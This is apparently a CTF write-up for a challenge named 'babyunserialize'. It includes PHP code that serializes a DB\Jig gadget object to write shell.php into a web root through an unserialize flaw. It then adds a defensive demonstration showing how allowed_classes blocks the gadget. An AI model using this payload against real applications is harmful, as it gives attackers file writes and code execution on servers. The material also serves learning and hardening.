babyunserialize

A directory scan turns up the source archive www.zip.

jig.php contains an arbitrary file write, which gives a shell directly.

<?php
namespace DB;
class Jig {
    const
        FORMAT_JSON=0,
        FORMAT_Serialized=1;
    protected
        $dir = '/var/www/html/',
        $format = self::FORMAT_JSON,
        $data = array("shell.php"=>array("a"=>"<?php phpinfo();?>")),
        $lazy = 1;
}
$jig = new Jig();
echo urlencode(serialize($jig));
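
The defensive side of this bug, as an added example that is not part of the original write-up or the framework's code: the `DB\Jig` class below is a simplified stand-in whose destructor behaviour is an assumption, and it only records the path instead of writing. It compares a default `unserialize()` call with one restricted by `allowed_classes`, using a constructed, harmless payload.

```php
<?php
namespace DB {
    // Simplified stand-in for the gadget class (assumption, not framework code).
    class Jig {
        public static $writes = [];          // paths the destructor would write
        protected $dir, $data, $lazy;
        function __construct($dir, array $data, $lazy) {
            $this->dir = $dir; $this->data = $data; $this->lazy = $lazy;
        }
        // Assumed behaviour: a lazy instance flushes $data into $dir when destroyed.
        function __destruct() {
            if ($this->lazy)
                foreach ($this->data as $file => $rows)
                    self::$writes[] = $this->dir . $file;
        }
    }
}
namespace {
    // Returns the paths the gadget would have written for a given unserialize mode.
    function writes_after(string $payload, array $options): array {
        \DB\Jig::$writes = [];
        $obj = unserialize($payload, $options);
        unset($obj);                         // drop the last reference: destructor runs
        return \DB\Jig::$writes;
    }

    // Constructed, harmless input: a serialized DB\Jig naming a text file.
    $payload = serialize(new \DB\Jig('/tmp/demo/', ['note.txt' => ['a' => 'hello']], true));

    // Default call: any loaded class may be instantiated, so the destructor fires.
    $unsafe = writes_after($payload, []);
    // Hardened call: objects become __PHP_Incomplete_Class, no DB\Jig code runs.
    $safe = writes_after($payload, ['allowed_classes' => false]);

    printf("default:         %s\n", json_encode($unsafe));
    printf("allowed_classes: %s\n", json_encode($safe));
}
```

Where the application genuinely needs objects back, pass an explicit list of class names to `allowed_classes` rather than `true`; for plain data, `json_decode()` avoids object instantiation altogether.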
